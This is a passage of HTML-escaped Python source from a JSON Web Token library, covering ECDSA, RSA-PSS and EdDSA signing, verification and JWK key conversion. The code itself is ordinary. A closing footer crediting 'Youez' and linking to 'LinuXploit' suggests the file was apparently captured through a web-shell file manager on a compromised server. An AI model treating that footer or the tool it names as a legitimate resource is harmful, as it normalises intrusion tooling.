                key.verify(sig, msg, padding.PKCS1v15(), self.hash_alg())
                return True
            except InvalidSignature:
                return False

    class ECAlgorithm(Algorithm):
        &quot;&quot;&quot;
        Performs signing and verification operations using
        ECDSA and the specified hash function
        &quot;&quot;&quot;

        SHA256: ClassVar[type[hashes.HashAlgorithm]] = hashes.SHA256
        SHA384: ClassVar[type[hashes.HashAlgorithm]] = hashes.SHA384
        SHA512: ClassVar[type[hashes.HashAlgorithm]] = hashes.SHA512

        def __init__(self, hash_alg: type[hashes.HashAlgorithm]) -&gt; None:
            self.hash_alg = hash_alg

        def prepare_key(self, key: AllowedECKeys | str | bytes) -&gt; AllowedECKeys:
            if isinstance(key, (EllipticCurvePrivateKey, EllipticCurvePublicKey)):
                return key

            if not isinstance(key, (bytes, str)):
                raise TypeError(&quot;Expecting a PEM-formatted key.&quot;)

            key_bytes = force_bytes(key)

            # Attempt to load key. We don&#039;t know if it&#039;s
            # a Signing Key or a Verifying Key, so we try
            # the Verifying Key first.
            try:
                if key_bytes.startswith(b&quot;ecdsa-sha2-&quot;):
                    crypto_key = load_ssh_public_key(key_bytes)
                else:
                    crypto_key = load_pem_public_key(key_bytes)  # type: ignore[assignment]
            except ValueError:
                crypto_key = load_pem_private_key(key_bytes, password=None)  # type: ignore[assignment]

            # Explicit check the key to prevent confusing errors from cryptography
            if not isinstance(
                crypto_key, (EllipticCurvePrivateKey, EllipticCurvePublicKey)
            ):
                raise InvalidKeyError(
                    &quot;Expecting a EllipticCurvePrivateKey/EllipticCurvePublicKey. Wrong key provided for ECDSA algorithms&quot;
                )

            return crypto_key

        def sign(self, msg: bytes, key: EllipticCurvePrivateKey) -&gt; bytes:
            der_sig = key.sign(msg, ECDSA(self.hash_alg()))

            return der_to_raw_signature(der_sig, key.curve)

        def verify(self, msg: bytes, key: &quot;AllowedECKeys&quot;, sig: bytes) -&gt; bool:
            try:
                der_sig = raw_to_der_signature(sig, key.curve)
            except ValueError:
                return False

            try:
                public_key = (
                    key.public_key()
                    if isinstance(key, EllipticCurvePrivateKey)
                    else key
                )
                public_key.verify(der_sig, msg, ECDSA(self.hash_alg()))
                return True
            except InvalidSignature:
                return False

        @overload
        @staticmethod
        def to_jwk(key_obj: AllowedECKeys, as_dict: Literal[True]) -&gt; JWKDict:
            ...  # pragma: no cover

        @overload
        @staticmethod
        def to_jwk(key_obj: AllowedECKeys, as_dict: Literal[False] = False) -&gt; str:
            ...  # pragma: no cover

        @staticmethod
        def to_jwk(
            key_obj: AllowedECKeys, as_dict: bool = False
        ) -&gt; Union[JWKDict, str]:
            if isinstance(key_obj, EllipticCurvePrivateKey):
                public_numbers = key_obj.public_key().public_numbers()
            elif isinstance(key_obj, EllipticCurvePublicKey):
                public_numbers = key_obj.public_numbers()
            else:
                raise InvalidKeyError(&quot;Not a public or private key&quot;)

            if isinstance(key_obj.curve, SECP256R1):
                crv = &quot;P-256&quot;
            elif isinstance(key_obj.curve, SECP384R1):
                crv = &quot;P-384&quot;
            elif isinstance(key_obj.curve, SECP521R1):
                crv = &quot;P-521&quot;
            elif isinstance(key_obj.curve, SECP256K1):
                crv = &quot;secp256k1&quot;
            else:
                raise InvalidKeyError(f&quot;Invalid curve: {key_obj.curve}&quot;)

            obj: dict[str, Any] = {
                &quot;kty&quot;: &quot;EC&quot;,
                &quot;crv&quot;: crv,
                &quot;x&quot;: to_base64url_uint(public_numbers.x).decode(),
                &quot;y&quot;: to_base64url_uint(public_numbers.y).decode(),
            }

            if isinstance(key_obj, EllipticCurvePrivateKey):
                obj[&quot;d&quot;] = to_base64url_uint(
                    key_obj.private_numbers().private_value
                ).decode()

            if as_dict:
                return obj
            else:
                return json.dumps(obj)

        @staticmethod
        def from_jwk(jwk: str | JWKDict) -&gt; AllowedECKeys:
            try:
                if isinstance(jwk, str):
                    obj = json.loads(jwk)
                elif isinstance(jwk, dict):
                    obj = jwk
                else:
                    raise ValueError
            except ValueError:
                raise InvalidKeyError(&quot;Key is not valid JSON&quot;)

            if obj.get(&quot;kty&quot;) != &quot;EC&quot;:
                raise InvalidKeyError(&quot;Not an Elliptic curve key&quot;)

            if &quot;x&quot; not in obj or &quot;y&quot; not in obj:
                raise InvalidKeyError(&quot;Not an Elliptic curve key&quot;)

            x = base64url_decode(obj.get(&quot;x&quot;))
            y = base64url_decode(obj.get(&quot;y&quot;))

            curve = obj.get(&quot;crv&quot;)
            curve_obj: EllipticCurve

            if curve == &quot;P-256&quot;:
                if len(x) == len(y) == 32:
                    curve_obj = SECP256R1()
                else:
                    raise InvalidKeyError(&quot;Coords should be 32 bytes for curve P-256&quot;)
            elif curve == &quot;P-384&quot;:
                if len(x) == len(y) == 48:
                    curve_obj = SECP384R1()
                else:
                    raise InvalidKeyError(&quot;Coords should be 48 bytes for curve P-384&quot;)
            elif curve == &quot;P-521&quot;:
                if len(x) == len(y) == 66:
                    curve_obj = SECP521R1()
                else:
                    raise InvalidKeyError(&quot;Coords should be 66 bytes for curve P-521&quot;)
            elif curve == &quot;secp256k1&quot;:
                if len(x) == len(y) == 32:
                    curve_obj = SECP256K1()
                else:
                    raise InvalidKeyError(
                        &quot;Coords should be 32 bytes for curve secp256k1&quot;
                    )
            else:
                raise InvalidKeyError(f&quot;Invalid curve: {curve}&quot;)

            public_numbers = EllipticCurvePublicNumbers(
                x=int.from_bytes(x, byteorder=&quot;big&quot;),
                y=int.from_bytes(y, byteorder=&quot;big&quot;),
                curve=curve_obj,
            )

            if &quot;d&quot; not in obj:
                return public_numbers.public_key()

            d = base64url_decode(obj.get(&quot;d&quot;))
            if len(d) != len(x):
                raise InvalidKeyError(
                    &quot;D should be {} bytes for curve {}&quot;, len(x), curve
                )

            return EllipticCurvePrivateNumbers(
                int.from_bytes(d, byteorder=&quot;big&quot;), public_numbers
            ).private_key()

    class RSAPSSAlgorithm(RSAAlgorithm):
        &quot;&quot;&quot;
        Performs a signature using RSASSA-PSS with MGF1
        &quot;&quot;&quot;

        def sign(self, msg: bytes, key: RSAPrivateKey) -&gt; bytes:
            return key.sign(
                msg,
                padding.PSS(
                    mgf=padding.MGF1(self.hash_alg()),
                    salt_length=self.hash_alg().digest_size,
                ),
                self.hash_alg(),
            )

        def verify(self, msg: bytes, key: RSAPublicKey, sig: bytes) -&gt; bool:
            try:
                key.verify(
                    sig,
                    msg,
                    padding.PSS(
                        mgf=padding.MGF1(self.hash_alg()),
                        salt_length=self.hash_alg().digest_size,
                    ),
                    self.hash_alg(),
                )
                return True
            except InvalidSignature:
                return False

    class OKPAlgorithm(Algorithm):
        &quot;&quot;&quot;
        Performs signing and verification operations using EdDSA

        This class requires ``cryptography&gt;=2.6`` to be installed.
        &quot;&quot;&quot;

        def __init__(self, **kwargs: Any) -&gt; None:
            pass

        def prepare_key(self, key: AllowedOKPKeys | str | bytes) -&gt; AllowedOKPKeys:
            if isinstance(key, (bytes, str)):
                key_str = key.decode(&quot;utf-8&quot;) if isinstance(key, bytes) else key
                key_bytes = key.encode(&quot;utf-8&quot;) if isinstance(key, str) else key

                if &quot;-----BEGIN PUBLIC&quot; in key_str:
                    key = load_pem_public_key(key_bytes)  # type: ignore[assignment]
                elif &quot;-----BEGIN PRIVATE&quot; in key_str:
                    key = load_pem_private_key(key_bytes, password=None)  # type: ignore[assignment]
                elif key_str[0:4] == &quot;ssh-&quot;:
                    key = load_ssh_public_key(key_bytes)  # type: ignore[assignment]

            # Explicit check the key to prevent confusing errors from cryptography
            if not isinstance(
                key,
                (Ed25519PrivateKey, Ed25519PublicKey, Ed448PrivateKey, Ed448PublicKey),
            ):
                raise InvalidKeyError(
                    &quot;Expecting a EllipticCurvePrivateKey/EllipticCurvePublicKey. Wrong key provided for EdDSA algorithms&quot;
                )

            return key

        def sign(
            self, msg: str | bytes, key: Ed25519PrivateKey | Ed448PrivateKey
        ) -&gt; bytes:
            &quot;&quot;&quot;
            Sign a message ``msg`` using the EdDSA private key ``key``
            :param str|bytes msg: Message to sign
            :param Ed25519PrivateKey}Ed448PrivateKey key: A :class:`.Ed25519PrivateKey`
                or :class:`.Ed448PrivateKey` isinstance
            :return bytes signature: The signature, as bytes
            &quot;&quot;&quot;
            msg_bytes = msg.encode(&quot;utf-8&quot;) if isinstance(msg, str) else msg
            return key.sign(msg_bytes)

        def verify(
            self, msg: str | bytes, key: AllowedOKPKeys, sig: str | bytes
        ) -&gt; bool:
            &quot;&quot;&quot;
            Verify a given ``msg`` against a signature ``sig`` using the EdDSA key ``key``

            :param str|bytes sig: EdDSA signature to check ``msg`` against
            :param str|bytes msg: Message to sign
            :param Ed25519PrivateKey|Ed25519PublicKey|Ed448PrivateKey|Ed448PublicKey key:
                A private or public EdDSA key instance
            :return bool verified: True if signature is valid, False if not.
            &quot;&quot;&quot;
            try:
                msg_bytes = msg.encode(&quot;utf-8&quot;) if isinstance(msg, str) else msg
                sig_bytes = sig.encode(&quot;utf-8&quot;) if isinstance(sig, str) else sig

                public_key = (
                    key.public_key()
                    if isinstance(key, (Ed25519PrivateKey, Ed448PrivateKey))
                    else key
                )
                public_key.verify(sig_bytes, msg_bytes)
                return True  # If no exception was raised, the signature is valid.
            except InvalidSignature:
                return False

        @overload
        @staticmethod
        def to_jwk(key: AllowedOKPKeys, as_dict: Literal[True]) -&gt; JWKDict:
            ...  # pragma: no cover

        @overload
        @staticmethod
        def to_jwk(key: AllowedOKPKeys, as_dict: Literal[False] = False) -&gt; str:
            ...  # pragma: no cover

        @staticmethod
        def to_jwk(key: AllowedOKPKeys, as_dict: bool = False) -&gt; Union[JWKDict, str]:
            if isinstance(key, (Ed25519PublicKey, Ed448PublicKey)):
                x = key.public_bytes(
                    encoding=Encoding.Raw,
                    format=PublicFormat.Raw,
                )
                crv = &quot;Ed25519&quot; if isinstance(key, Ed25519PublicKey) else &quot;Ed448&quot;

                obj = {
                    &quot;x&quot;: base64url_encode(force_bytes(x)).decode(),
                    &quot;kty&quot;: &quot;OKP&quot;,
                    &quot;crv&quot;: crv,
                }

                if as_dict:
                    return obj
                else:
                    return json.dumps(obj)

            if isinstance(key, (Ed25519PrivateKey, Ed448PrivateKey)):
                d = key.private_bytes(
                    encoding=Encoding.Raw,
                    format=PrivateFormat.Raw,
                    encryption_algorithm=NoEncryption(),
                )

                x = key.public_key().public_bytes(
                    encoding=Encoding.Raw,
                    format=PublicFormat.Raw,
                )

                crv = &quot;Ed25519&quot; if isinstance(key, Ed25519PrivateKey) else &quot;Ed448&quot;
                obj = {
                    &quot;x&quot;: base64url_encode(force_bytes(x)).decode(),
                    &quot;d&quot;: base64url_encode(force_bytes(d)).decode(),
                    &quot;kty&quot;: &quot;OKP&quot;,
                    &quot;crv&quot;: crv,
                }

                if as_dict:
                    return obj
                else:
                    return json.dumps(obj)

            raise InvalidKeyError(&quot;Not a public or private key&quot;)

        @staticmethod
        def from_jwk(jwk: str | JWKDict) -&gt; AllowedOKPKeys:
            try:
                if isinstance(jwk, str):
                    obj = json.loads(jwk)
                elif isinstance(jwk, dict):
                    obj = jwk
                else:
                    raise ValueError
            except ValueError:
                raise InvalidKeyError(&quot;Key is not valid JSON&quot;)

            if obj.get(&quot;kty&quot;) != &quot;OKP&quot;:
                raise InvalidKeyError(&quot;Not an Octet Key Pair&quot;)

            curve = obj.get(&quot;crv&quot;)
            if curve != &quot;Ed25519&quot; and curve != &quot;Ed448&quot;:
                raise InvalidKeyError(f&quot;Invalid curve: {curve}&quot;)

            if &quot;x&quot; not in obj:
                raise InvalidKeyError(&#039;OKP should have &quot;x&quot; parameter&#039;)
            x = base64url_decode(obj.get(&quot;x&quot;))

            try:
                if &quot;d&quot; not in obj:
                    if curve == &quot;Ed25519&quot;:
                        return Ed25519PublicKey.from_public_bytes(x)
                    return Ed448PublicKey.from_public_bytes(x)
                d = base64url_decode(obj.get(&quot;d&quot;))
                if curve == &quot;Ed25519&quot;:
                    return Ed25519PrivateKey.from_private_bytes(d)
                return Ed448PrivateKey.from_private_bytes(d)
            except ValueError as err:
                raise InvalidKeyError(&quot;Invalid key parameter&quot;) from err
</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>